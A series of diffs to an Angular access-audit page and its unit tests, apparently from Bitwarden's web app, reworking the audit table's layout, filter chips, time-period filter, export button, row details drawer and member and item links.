-                  <span class="tw-whitespace-nowrap" [bitTooltip]="row.exactWindow">{{
-                    duration.key | i18n: duration.value
-                  }}</span>
-                } @else if (row.extendedUntil) {
-                  <span class="tw-whitespace-nowrap">{{
-                    "pamAuditDurationExtendedTo" | i18n: (row.extendedUntil | date: "short")
-                  }}</span>
-                } @else {
-                  <span class="tw-text-muted">—</span>
-                }
-              </td>
-              <td bitCell>{{ row.detail }}</td>
+      <div class="tw-overflow-x-auto">
+        <bit-table>
+          <ng-container header>
+            <tr>
+              <th bitCell class="tw-whitespace-nowrap">{{ "pamAuditColumnTime" | i18n }}</th>
+              <th bitCell class="tw-whitespace-nowrap">{{ "pamAuditColumnEvent" | i18n }}</th>
+              <th bitCell>{{ "pamAuditColumnActor" | i18n }}</th>
+              <th bitCell>{{ "pamAuditColumnRequester" | i18n }}</th>
+              <th bitCell class="tw-max-w-64 tw-break-words">{{ "pamAuditColumnItem" | i18n }}</th>
+              <th bitCell>{{ "pamAuditColumnDuration" | i18n }}</th>
+              <th bitCell class="tw-max-w-64 tw-break-words">
+                {{ "pamAuditColumnDetail" | i18n }}
+              </th>
             </tr>
-          }
-        </ng-template>
-      </bit-table>
+          </ng-container>
+          <ng-template body>
+            @for (row of filteredRows(); track $index) {
+              <tr bitRow>
+                <td bitCell class="tw-whitespace-nowrap">
+                  <span [bitTooltip]="row.occurredAt | date: 'medium'">{{
+                    row.occurredAt | date: "short"
+                  }}</span>
+                </td>
+                <td bitCell class="tw-whitespace-nowrap">
+                  {{ row.kindLabelKey | i18n }}
+                  @if (row.inDoubt) {
+                    <span
+                      bitBadge
+                      variant="warning"
+                      [bitTooltip]="'pamAuditIncompleteTooltip' | i18n"
+                      >{{ "pamAuditIncomplete" | i18n }}</span
+                    >
+                  }
+                </td>
+                <td bitCell>
+                  @if (row.automated) {
+                    <span class="tw-text-muted">{{ "pamAuditSystem" | i18n }}</span>
+                  } @else {
+                    {{ row.actor }}
+                  }
+                </td>
+                <td bitCell>{{ row.requester }}</td>
+                <td bitCell class="tw-max-w-64 tw-break-words">
+                  @if (row.cipherName) {
+                    <span [bitTooltip]="row.collectionName">{{ row.cipherName }}</span>
+                  } @else if (row.ruleName) {
+                    {{ row.ruleName }}
+                  } @else {
+                    <span class="tw-text-muted">—</span>
+                  }
+                </td>
+                <td bitCell>
+                  @if (row.duration; as duration) {
+                    <span class="tw-whitespace-nowrap" [bitTooltip]="row.exactWindow">{{
+                      duration.key | i18n: duration.value
+                    }}</span>
+                  } @else if (row.extendedUntil) {
+                    <span class="tw-whitespace-nowrap">{{
+                      "pamAuditDurationExtendedTo" | i18n: (row.extendedUntil | date: "short")
+                    }}</span>
+                  } @else {
+                    <span class="tw-text-muted">—</span>
+                  }
+                </td>
+                <td bitCell class="tw-max-w-64 tw-break-words">{{ row.detail }}</td>
+              </tr>
+            }
+          </ng-template>
+        </bit-table>
+      </div>
     }
   }
 }

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -48,11 +48,33 @@
     </bit-status-lockup>
   }
   @case ("ready") {
-    <div
-      class="tw-mb-4 tw-flex tw-flex-wrap tw-items-start tw-gap-3"
-      id="access-audit_container_toolbar"
-    >
-      <div class="tw-mt-7 tw-flex tw-min-h-10 tw-flex-wrap tw-items-center tw-gap-3">
+    <div class="tw-mb-4 tw-flex tw-flex-col tw-gap-3" id="access-audit_container_toolbar">
+      <div class="tw-flex tw-justify-end tw-gap-3" id="access-audit_container_actions">
+        <button
+          type="button"
+          bitButton
+          buttonType="primary"
+          id="access-audit_button_refresh"
+          [bitAction]="load"
+        >
+          {{ "update" | i18n }}
+        </button>
+        <button
+          type="button"
+          bitButton
+          buttonType="secondary"
+          id="access-audit_button_export"
+          endIcon="bwi-import"
+          [bitAction]="exportCsv"
+          [disabled]="filteredRows().length === 0"
+        >
+          {{ "exportVerb" | i18n }}
+        </button>
+      </div>
+      <div
+        class="tw-flex tw-flex-wrap tw-items-center tw-gap-3"
+        id="access-audit_container_filters"
+      >
         <!--
           Each option list sits inside an `@if` rather than directly under its chip. `refreshView` runs a
           view's effects before it updates that view's embedded views, so an option created by a `@for` in
@@ -61,14 +83,22 @@
           kind or a new member into the trail. Nesting the loop one view deeper moves the option's creation
           after those effects have run, so the chip only ever sees a fully bound option.
         -->
-        <bit-filter-menu [key]="filterKeys.kind" [placeholderText]="'pamAuditColumnEvent' | i18n">
+        <bit-filter-menu
+          #kindFilter
+          [key]="filterKeys.kind"
+          [placeholderText]="'pamAuditColumnEvent' | i18n"
+        >
           @if (kindOptions(); as options) {
             @for (option of options; track option.value) {
               <bit-filter-option [value]="option.value">{{ option.label }}</bit-filter-option>
             }
           }
         </bit-filter-menu>
-        <bit-filter-menu [key]="filterKeys.actor" [placeholderText]="'pamAuditColumnActor' | i18n">
+        <bit-filter-menu
+          #actorFilter
+          [key]="filterKeys.actor"
+          [placeholderText]="'pamAuditColumnActor' | i18n"
+        >
           @if (actorOptions(); as options) {
             @for (option of options; track option.value) {
               <bit-filter-option [value]="option.value">{{ option.label }}</bit-filter-option>
@@ -76,6 +106,7 @@
           }
         </bit-filter-menu>
         <bit-filter-menu
+          #requesterFilter
           [key]="filterKeys.requester"
           [placeholderText]="'pamAuditColumnRequester' | i18n"
         >
@@ -85,49 +116,31 @@
             }
           }
         </bit-filter-menu>
+        <bit-filter-menu
+          #timePeriodFilter
+          [key]="filterKeys.timePeriod"
+          [placeholderText]="'timePeriod' | i18n"
+          [unsetLabel]="'allTime' | i18n"
+        >
+          @for (preset of timePresets; track preset.value) {
+            <bit-filter-option [value]="preset.value">{{ preset.label }}</bit-filter-option>
+          }
+          <bit-filter-option value="custom">{{ customPeriodLabel }}</bit-filter-option>
+        </bit-filter-menu>
+        @if (filtersActive()) {
+          <button
+            type="button"
+            bitButton
+            buttonType="subtleGhost"
+            size="small"
+            startIcon="bwi-clear"
+            id="access-audit_button_clear-all"
+            (click)="clearAll()"
+          >
+            {{ "clearAll" | i18n }}
+          </button>
+        }
       </div>
-      <bit-form-field disableMargin>
-        <bit-label>{{ "from" | i18n }}</bit-label>
-        <input
-          bitInput
-          type="datetime-local"
-          id="access-audit_input_from"
-          [placeholder]="'startDate' | i18n"
-          [formControl]="fromControl"
-        />
-      </bit-form-field>
-      <bit-form-field disableMargin>
-        <bit-label>{{ "to" | i18n }}</bit-label>
-        <input
-          bitInput
-          type="datetime-local"
-          id="access-audit_input_to"
-          [placeholder]="'endDate' | i18n"
-          [formControl]="toControl"
-        />
-      </bit-form-field>
-      <button
-        type="button"
-        bitButton
-        buttonType="primary"
-        class="tw-mt-7"
-        id="access-audit_button_refresh"
-        [bitAction]="load"
-      >
-        {{ "update" | i18n }}
-      </button>
-      <button
-        type="button"
-        bitButton
-        buttonType="secondary"
-        class="tw-ms-auto tw-mt-7"
-        id="access-audit_button_export"
-        endIcon="bwi-import"
-        [bitAction]="exportCsv"
-        [disabled]="filteredRows().length === 0"
-      >
-        {{ "exportVerb" | i18n }}
-      </button>
     </div>
 
     @if (filteredRows().length === 0) {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -198,16 +198,32 @@
               <th bitCell>{{ "pamAuditColumnRequester" | i18n }}</th>
               <th bitCell class="tw-max-w-64 tw-break-words">{{ "pamAuditColumnItem" | i18n }}</th>
               <th bitCell>{{ "pamAuditColumnDuration" | i18n }}</th>
-              <th bitCell class="tw-max-w-64 tw-break-words">
-                {{ "pamAuditColumnDetail" | i18n }}
-              </th>
             </tr>
           </ng-container>
           <ng-template body>
             @for (row of filteredRows(); track $index) {
-              <tr bitRow>
+              <tr bitRow class="tw-cursor-pointer" (click)="openDetails(row)">
                 <td bitCell class="tw-whitespace-nowrap">{{ row.occurredAt | date: "medium" }}</td>
-                <td bitCell class="tw-whitespace-nowrap">
+                <!--
+                  The row's keyboard affordance, following the clickable-row pattern the access
+                  intelligence tables use (`role="button"` + `tabindex` + Enter/Space on the cell
+                  rather than on the `tr`, which is neither focusable nor nameable). One cell carries
+                  it rather than all six: a trail is ninety days long, and a tab stop per cell would
+                  put hundreds between an auditor and the end of the table. Pointer activation stays
+                  on the row itself, so the cell must not repeat it — the click would arrive twice.
+                -->
+                <td
+                  bitCell
+                  role="button"
+                  tabindex="0"
+                  class="tw-whitespace-nowrap focus-visible:tw-outline-none focus-visible:tw-ring-2 focus-visible:tw-ring-inset focus-visible:tw-ring-border-focus"
+                  id="access-audit_button_details-{{ $index }}"
+                  [attr.aria-label]="
+                    (row.kindLabelKey | i18n) + ' ' + (row.occurredAt | date: 'medium')
+                  "
+                  (keydown.enter)="openDetails(row)"
+                  (keydown.space)="openDetails(row); $event.preventDefault()"
+                >
                   {{ row.kindLabelKey | i18n }}
                   @if (row.inDoubt) {
                     <span
@@ -279,13 +295,6 @@
                     <span class="tw-whitespace-nowrap">{{
                       "pamAuditDurationExtendedTo" | i18n: (row.extendedUntil | date: "short")
                     }}</span>
-                  } @else {
-                    <span class="tw-text-muted">—</span>
-                  }
-                </td>
-                <td bitCell class="tw-max-w-64 tw-break-words">
-                  @if (row.detail) {
-                    {{ row.detail }}
                   } @else {
                     <span class="tw-text-muted">—</span>
                   }

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -191,7 +191,7 @@
         <bit-table>
           <ng-container header>
             <tr>
-              <th bitCell class="tw-whitespace-nowrap">{{ "pamAuditColumnTime" | i18n }}</th>
+              <th bitCell class="tw-whitespace-nowrap">{{ "timestamp" | i18n }}</th>
               <th bitCell class="tw-whitespace-nowrap">{{ "pamAuditColumnEvent" | i18n }}</th>
               <th bitCell>{{ "pamAuditColumnActor" | i18n }}</th>
               <th bitCell>{{ "pamAuditColumnRequester" | i18n }}</th>
@@ -205,11 +205,7 @@
           <ng-template body>
             @for (row of filteredRows(); track $index) {
               <tr bitRow>
-                <td bitCell class="tw-whitespace-nowrap">
-                  <span [bitTooltip]="row.occurredAt | date: 'medium'">{{
-                    row.occurredAt | date: "short"
-                  }}</span>
-                </td>
+                <td bitCell class="tw-whitespace-nowrap">{{ row.occurredAt | date: "medium" }}</td>
                 <td bitCell class="tw-whitespace-nowrap">
                   {{ row.kindLabelKey | i18n }}
                   @if (row.inDoubt) {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -196,7 +196,9 @@
               <th bitCell class="tw-whitespace-nowrap">{{ "pamAuditColumnEvent" | i18n }}</th>
               <th bitCell>{{ "pamAuditColumnActor" | i18n }}</th>
               <th bitCell>{{ "pamAuditColumnRequester" | i18n }}</th>
-              <th bitCell class="tw-max-w-64 tw-break-words">{{ "pamAuditColumnItem" | i18n }}</th>
+              <th bitCell class="tw-min-w-48 tw-max-w-64 tw-break-words">
+                {{ "pamAuditColumnItem" | i18n }}
+              </th>
               <th bitCell>{{ "pamAuditColumnDuration" | i18n }}</th>
             </tr>
           </ng-container>
@@ -268,7 +270,7 @@
                     <span class="tw-text-muted">—</span>
                   }
                 </td>
-                <td bitCell class="tw-max-w-64 tw-break-words">
+                <td bitCell class="tw-min-w-48 tw-max-w-64 tw-break-words">
                   @if (row.cipherName && row.cipherId) {
                     <a
                       bitLink

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -138,13 +138,44 @@
                 <td bitCell>
                   @if (row.automated) {
                     <span class="tw-text-muted">{{ "pamAuditSystem" | i18n }}</span>
+                  } @else if (linkedMember(row.actorId, row.actor); as member) {
+                    <a
+                      bitLink
+                      href="#"
+                      id="access-audit_link_actor-{{ $index }}"
+                      [title]="member.email"
+                      (click)="openMemberEvents($event, member)"
+                      >{{ row.actor }}</a
+                    >
                   } @else {
                     {{ row.actor }}
                   }
                 </td>
-                <td bitCell>{{ row.requester }}</td>
+                <td bitCell>
+                  @if (linkedMember(row.requesterId, row.requester); as member) {
+                    <a
+                      bitLink
+                      href="#"
+                      id="access-audit_link_requester-{{ $index }}"
+                      [title]="member.email"
+                      (click)="openMemberEvents($event, member)"
+                      >{{ row.requester }}</a
+                    >
+                  } @else {
+                    {{ row.requester }}
+                  }
+                </td>
                 <td bitCell class="tw-max-w-64 tw-break-words">
-                  @if (row.cipherName) {
+                  @if (row.cipherName && row.cipherId) {
+                    <a
+                      bitLink
+                      href="#"
+                      id="access-audit_link_item-{{ $index }}"
+                      [bitTooltip]="row.collectionName"
+                      (click)="openCipherEvents($event, row)"
+                      >{{ row.cipherName }}</a
+                    >
+                  } @else if (row.cipherName) {
                     <span [bitTooltip]="row.collectionName">{{ row.cipherName }}</span>
                   } @else if (row.ruleName) {
                     {{ row.ruleName }}

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -38,7 +38,7 @@
     </bit-status-lockup>
   }
   @case ("ready") {
-    <div class="tw-mb-4 tw-flex tw-items-center tw-gap-3">
+    <div class="tw-mb-4 tw-flex tw-flex-wrap tw-items-center tw-gap-3">
       <bit-search
         class="tw-grow tw-max-w-md"
         [placeholder]="'pamAuditSearchPlaceholder' | i18n"
@@ -53,6 +53,46 @@
           <bit-filter-option [value]="option.value">{{ option.label }}</bit-filter-option>
         }
       </bit-filter-menu>
+      <bit-chip-filter
+        [placeholderText]="'pamAuditColumnActor' | i18n"
+        placeholderIcon="bwi-filter"
+        [options]="actorOptions()"
+        [formControl]="actorControl"
+      ></bit-chip-filter>
+      <bit-chip-filter
+        [placeholderText]="'pamAuditColumnRequester' | i18n"
+        placeholderIcon="bwi-filter"
+        [options]="requesterOptions()"
+        [formControl]="requesterControl"
+      ></bit-chip-filter>
+    </div>
+
+    <div class="tw-mb-4">
+      <div class="tw-flex tw-flex-wrap tw-items-start tw-gap-3">
+        <bit-form-field disableMargin>
+          <bit-label>{{ "from" | i18n }}</bit-label>
+          <input
+            bitInput
+            type="datetime-local"
+            id="access-audit_input_from"
+            [placeholder]="'startDate' | i18n"
+            [formControl]="fromControl"
+          />
+        </bit-form-field>
+        <bit-form-field disableMargin>
+          <bit-label>{{ "to" | i18n }}</bit-label>
+          <input
+            bitInput
+            type="datetime-local"
+            id="access-audit_input_to"
+            [placeholder]="'endDate' | i18n"
+            [formControl]="toControl"
+          />
+        </bit-form-field>
+      </div>
+      @if (invertedRange()) {
+        <bit-error [error]="invalidRangeError"></bit-error>
+      }
     </div>
 
     @if (filteredRows().length === 0) {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -65,6 +65,17 @@
         [options]="requesterOptions()"
         [formControl]="requesterControl"
       ></bit-chip-filter>
+      <button
+        type="button"
+        bitButton
+        buttonType="secondary"
+        class="tw-ms-auto"
+        id="access-audit_button_export"
+        [bitAction]="exportCsv"
+        [disabled]="filteredRows().length === 0"
+      >
+        {{ "exportVerb" | i18n }}
+      </button>
     </div>
 
     <div class="tw-mb-4 tw-flex tw-flex-wrap tw-items-start tw-gap-3">

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -120,6 +120,18 @@
           }
         </bit-filter-menu>
         <bit-filter-menu
+          #itemFilter
+          multiple
+          [key]="filterKeys.item"
+          [placeholderText]="'pamAuditColumnItem' | i18n"
+        >
+          @if (itemOptions(); as options) {
+            @for (option of options; track option.value) {
+              <bit-filter-option [value]="option.value">{{ option.label }}</bit-filter-option>
+            }
+          }
+        </bit-filter-menu>
+        <bit-filter-menu
           #timePeriodFilter
           [key]="filterKeys.timePeriod"
           [placeholderText]="'timePeriod' | i18n"

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.html
@@ -142,6 +142,19 @@
           }
           <bit-filter-option value="custom">{{ customPeriodLabel }}</bit-filter-option>
         </bit-filter-menu>
+        @if (customRangeApplied()) {
+          <button
+            type="button"
+            bitButton
+            buttonType="subtleGhost"
+            size="small"
+            startIcon="bwi-pencil"
+            id="access-audit_button_edit-range"
+            [bitAction]="editCustomRange"
+          >
+            {{ "edit" | i18n }}
+          </button>
+        }
         @if (filtersActive()) {
           <button
             type="button"

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -568,4 +568,75 @@ describe("AccessAuditComponent", () => {
       expect(fileDownloadService.download).not.toHaveBeenCalled();
     });
   });
+
+  describe("column widths", () => {
+    /** Time, Event, Actor, Requester, Item, Duration, Detail — the order the template declares. */
+    const TIME = 0;
+    const EVENT = 1;
+    const ACTOR = 2;
+    const REQUESTER = 3;
+    const ITEM = 4;
+    const DETAIL = 6;
+
+    const renderTable = async () => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue([event()]);
+
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+
+      return {
+        headers: Array.from<HTMLElement>(
+          fixture.nativeElement.querySelectorAll("bit-table thead th"),
+        ),
+        cells: Array.from<HTMLElement>(
+          fixture.nativeElement.querySelectorAll("bit-table tbody tr td"),
+        ),
+      };
+    };
+
+    it("holds Time and Event on one line, header and body cell alike", async () => {
+      const { headers, cells } = await renderTable();
+
+      for (const column of [TIME, EVENT]) {
+        expect(headers[column].classList).toContain("tw-whitespace-nowrap");
+        expect(cells[column].classList).toContain("tw-whitespace-nowrap");
+      }
+    });
+
+    it("keeps the bitCell padding alongside the width classes", async () => {
+      const { headers, cells } = await renderTable();
+
+      // bitCell sets `class` through a HostBinding; a static class attribute on the same element
+      // has to survive that merge or every width class here is silently inert.
+      expect(headers[TIME].classList).toContain("tw-p-3");
+      expect(cells[ITEM].classList).toContain("tw-p-3");
+    });
+
+    it("caps Item and Detail and lets their text break inside the cap", async () => {
+      const { headers, cells } = await renderTable();
+
+      for (const column of [ITEM, DETAIL]) {
+        expect(headers[column].classList).toContain("tw-max-w-64");
+        expect(headers[column].classList).toContain("tw-break-words");
+        expect(cells[column].classList).toContain("tw-max-w-64");
+        expect(cells[column].classList).toContain("tw-break-words");
+      }
+    });
+
+    it("leaves the unbounded name columns free to wrap", async () => {
+      const { cells } = await renderTable();
+
+      for (const column of [ACTOR, REQUESTER]) {
+        expect(cells[column].classList).not.toContain("tw-whitespace-nowrap");
+      }
+    });
+
+    it("gives the table its own horizontal scroll container", async () => {
+      await renderTable();
+
+      const table = fixture.nativeElement.querySelector("bit-table");
+      expect(table.parentElement.classList).toContain("tw-overflow-x-auto");
+    });
+  });
 });

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -357,6 +357,65 @@ describe("AccessAuditComponent", () => {
     expect(component().filteredRows()[0].actor).toBe("Ada");
   });
 
+  // An auditor reconstructing an incident is usually following two or three people at once; narrowing to
+  // each in turn would lose the order the events happened in.
+  it("keeps every row matching any of several selected actors", async () => {
+    auditApiService.listAccessAuditTrail.mockResolvedValue([
+      event({ ActorId: "user-1", ActorName: "Ada" }),
+      event({ ActorId: "user-3", ActorName: "Linus" }),
+      event({ ActorId: "user-4", ActorName: "Katherine" }),
+    ]);
+
+    fixture.detectChanges();
+    await fixture.whenStable();
+
+    selectFilter("actor", ["user-1", "user-4"]);
+
+    expect(
+      component()
+        .filteredRows()
+        .map((row: any) => row.actor),
+    ).toEqual(["Ada", "Katherine"]);
+  });
+
+  it("narrows across chips while widening within one", async () => {
+    auditApiService.listAccessAuditTrail.mockResolvedValue([
+      event({ Kind: "requestApproved", ActorId: "user-1", ActorName: "Ada" }),
+      event({ Kind: "leaseActivated", ActorId: "user-1", ActorName: "Ada" }),
+      event({ Kind: "leaseActivated", ActorId: "user-3", ActorName: "Linus" }),
+    ]);
+
+    fixture.detectChanges();
+    await fixture.whenStable();
+
+    selectFilter("kind", ["pamAuditKindRequestApproved", "pamAuditKindLeaseActivated"]);
+    selectFilter("actor", ["user-1"]);
+
+    expect(component().filteredRows()).toHaveLength(2);
+    expect(
+      component()
+        .filteredRows()
+        .every((row: any) => row.actor === "Ada"),
+    ).toBe(true);
+  });
+
+  it("goes back to matching everything when the last value is removed from a chip", async () => {
+    auditApiService.listAccessAuditTrail.mockResolvedValue([
+      event({ ActorId: "user-1", ActorName: "Ada" }),
+      event({ ActorId: "user-3", ActorName: "Linus" }),
+    ]);
+
+    fixture.detectChanges();
+    await fixture.whenStable();
+
+    selectFilter("actor", ["user-1"]);
+    expect(component().filteredRows()).toHaveLength(1);
+
+    selectFilter("actor", []);
+
+    expect(component().filteredRows()).toHaveLength(2);
+  });
+
   it("offers an actor option per identity that acted, plus the system bucket", async () => {
     auditApiService.listAccessAuditTrail.mockResolvedValue([
       event({ ActorId: "user-1", ActorName: "Ada" }),
@@ -817,6 +876,21 @@ describe("AccessAuditComponent", () => {
 
       expect(toolbar.querySelectorAll(".tw-mt-7")).toHaveLength(0);
       expect(toolbar.querySelectorAll(".tw-ms-auto")).toHaveLength(0);
+    });
+
+    // Event, Actor and Requester each answer "which of these", and only the time period is one-of.
+    it("makes every chip but the time period multi-select", async () => {
+      const toolbar = await renderToolbar();
+
+      const chips = [...toolbar.querySelectorAll("bit-filter-menu")];
+      expect(chips).toHaveLength(4);
+      expect(chips.filter((chip) => chip.hasAttribute("multiple"))).toHaveLength(3);
+
+      const timePeriod = chips.find((chip) =>
+        chip.querySelector("button")?.getAttribute("title")?.startsWith("Time period"),
+      )!;
+      expect(timePeriod).not.toBeUndefined();
+      expect(timePeriod.hasAttribute("multiple")).toBe(false);
     });
 
     it("wraps the chip row rather than overflowing it", async () => {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -73,7 +73,7 @@ describe("AccessAuditComponent", () => {
   let organizationUserApiService: MockProxy<OrganizationUserApiService>;
   let dialogService: MockProxy<DialogService>;
 
-  const configureTestBed = async (canManageAccessRules = true) => {
+  const configureTestBed = async (canManageAccessRules = true, canViewAllCollections = true) => {
     await TestBed.configureTestingModule({
       imports: [AccessAuditComponent],
       providers: [
@@ -92,7 +92,8 @@ describe("AccessAuditComponent", () => {
         {
           provide: OrganizationService,
           useValue: {
-            organizations$: () => of([{ id: ORGANIZATION_ID, canManageAccessRules }]),
+            organizations$: () =>
+              of([{ id: ORGANIZATION_ID, canManageAccessRules, canViewAllCollections }]),
           },
         },
         {
@@ -1468,6 +1469,28 @@ describe("AccessAuditComponent", () => {
 
       expect(drawerData().actor).toBeNull();
       expect(drawerData().requester).toBeNull();
+    });
+
+    // The page already read the viewer's membership; a pane re-deriving it could offer a link the
+    // page itself would not.
+    it("hands the drawer the permissions its links are gated on", async () => {
+      await render([event()]);
+
+      rows()[0].click();
+
+      expect(drawerData().canManageAccessRules).toBe(true);
+      expect(drawerData().canViewCollections).toBe(true);
+    });
+
+    it("hands the drawer neither permission when the viewer holds neither", async () => {
+      TestBed.resetTestingModule();
+      await configureTestBed(false, false);
+      await render([event()]);
+
+      rows()[0].click();
+
+      expect(drawerData().canManageAccessRules).toBe(false);
+      expect(drawerData().canViewCollections).toBe(false);
     });
 
     // An anchor inside the row already opens something of its own. Letting the click reach the row

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -1447,9 +1447,14 @@ describe("AccessAuditComponent", () => {
       fixture.detectChanges();
 
       expect(component().status()).toBe("empty");
-      const noItems = fixture.nativeElement.querySelector("bit-no-items") as HTMLElement;
-      expect(noItems.querySelector("[slot=title]")!.textContent!.trim()).toBe("No audit activity");
-      expect(fixture.nativeElement.querySelector("#access-audit_link_access-rules")).not.toBeNull();
+      const accessRulesLink = fixture.nativeElement.querySelector(
+        "#access-audit_link_access-rules",
+      );
+      expect(accessRulesLink).not.toBeNull();
+      const emptyState = accessRulesLink!.closest("bit-status-lockup")!;
+      expect(emptyState.querySelector("[slot=title]")!.textContent!.trim()).toBe(
+        "No audit activity",
+      );
       expect(emptyStateClearAll()).toBeNull();
     });
 

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -1422,7 +1422,7 @@ describe("AccessAuditComponent", () => {
       overFilter();
 
       expect(component().filteredRows()).toHaveLength(0);
-      expect(fixture.nativeElement.querySelector("bit-no-items")).not.toBeNull();
+      expect(fixture.nativeElement.querySelector("bit-status-lockup")).not.toBeNull();
       expect(fixture.nativeElement.querySelector("bit-callout")).toBeNull();
       expect(fixture.nativeElement.querySelector("bit-table")).toBeNull();
     });
@@ -1431,9 +1431,11 @@ describe("AccessAuditComponent", () => {
       await renderReady();
       overFilter();
 
-      const noItems = fixture.nativeElement.querySelector("bit-no-items") as HTMLElement;
-      expect(noItems.querySelector("[slot=title]")!.textContent!.trim()).toBe("No matching events");
-      expect(noItems.querySelector("[slot=description]")!.textContent!.trim()).toBe(
+      const emptyState = emptyStateClearAll()!.closest("bit-status-lockup")!;
+      expect(emptyState.querySelector("[slot=title]")!.textContent!.trim()).toBe(
+        "No matching events",
+      );
+      expect(emptyState.querySelector("[slot=description]")!.textContent!.trim()).toBe(
         "No events match the current filters.",
       );
     });

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -1440,6 +1440,20 @@ describe("AccessAuditComponent", () => {
       expect(drawerData().organizationId).toBe(ORGANIZATION_ID);
     });
 
+    // `openDrawer` defaults `closeOnNavigation` to false and `DrawerService` only tears the stack down
+    // when the bottom ref asked for it, so without this the pane stays mounted over whatever page the
+    // auditor navigates to next.
+    it("closes the drawer when the auditor navigates away", async () => {
+      await render([event()]);
+
+      rows()[0].click();
+
+      expect(dialogService.openDrawer).toHaveBeenCalledWith(
+        expect.anything(),
+        expect.objectContaining({ closeOnNavigation: true }),
+      );
+    });
+
     // The member lookup ran once for the whole trail; the pane must link exactly what the row under
     // it links, which it can only do if the page hands over the answer it already has.
     it("hands the drawer the identities the row resolved", async () => {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -80,7 +80,6 @@ describe("AccessAuditComponent", () => {
             pamAuditEmptyTitle: "No audit activity",
             pamAuditEmptyMessage: "Activity will appear here.",
             pamAccessRules: "Access rules",
-            pamAuditSearchPlaceholder: "Search the audit log",
             backTo: "Back to __$1__",
             viewItemsIn: "View items in __$1__",
             from: "From",
@@ -112,7 +111,6 @@ describe("AccessAuditComponent", () => {
             all: "All",
             removeItem: (name?: string) => `Remove ${name}`,
             search: "Search",
-            resetSearch: "Reset search",
             exportVerb: "Export",
             close: "Close",
           }),
@@ -324,21 +322,6 @@ describe("AccessAuditComponent", () => {
     expect(component().filteredRows()[0].actor).toBe("Ada");
   });
 
-  it("filters rows by free text over actor, requester, item, and detail", async () => {
-    auditApiService.listAccessAuditTrail.mockResolvedValue([
-      event({ ActorName: "Ada" }),
-      event({ ActorName: "Linus" }),
-    ]);
-
-    fixture.detectChanges();
-    await fixture.whenStable();
-
-    component().searchControl.setValue("ada");
-
-    expect(component().filteredRows()).toHaveLength(1);
-    expect(component().filteredRows()[0].actor).toBe("Ada");
-  });
-
   it("offers an actor option per identity that acted, plus the system bucket", async () => {
     auditApiService.listAccessAuditTrail.mockResolvedValue([
       event({ ActorId: "user-1", ActorName: "Ada" }),
@@ -490,7 +473,6 @@ describe("AccessAuditComponent", () => {
     expect(auditApiService.listAccessAuditTrail).toHaveBeenCalledTimes(1);
     fixture.detectChanges();
 
-    component().searchControl.setValue("ada");
     kindChip().toggle("pamAuditKindLeaseActivated");
     component().actorControl.setValue("user-1");
     component().requesterControl.setValue("user-2");
@@ -565,7 +547,9 @@ describe("AccessAuditComponent", () => {
     });
 
     it("disables Export while no row matches the filters", async () => {
-      auditApiService.listAccessAuditTrail.mockResolvedValue([event({ ActorName: "Ada" })]);
+      auditApiService.listAccessAuditTrail.mockResolvedValue([
+        event({ Kind: "requestApproved", ActorName: "Ada" }),
+      ]);
 
       fixture.detectChanges();
       await fixture.whenStable();
@@ -574,7 +558,7 @@ describe("AccessAuditComponent", () => {
       const button = fixture.nativeElement.querySelector("#access-audit_button_export");
       expect(button.getAttribute("aria-disabled")).toBeNull();
 
-      component().searchControl.setValue("nothing matches this");
+      kindChip().toggle("pamAuditKindLeaseActivated");
       fixture.detectChanges();
       await fixture.whenStable();
       fixture.detectChanges();

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -75,6 +75,13 @@ describe("AccessAuditComponent", () => {
             pamAuditEmptyMessage: "Activity will appear here.",
             pamAccessRules: "Access rules",
             pamAuditSearchPlaceholder: "Search the audit log",
+            backTo: "Back to __$1__",
+            viewItemsIn: "View items in __$1__",
+            from: "From",
+            to: "To",
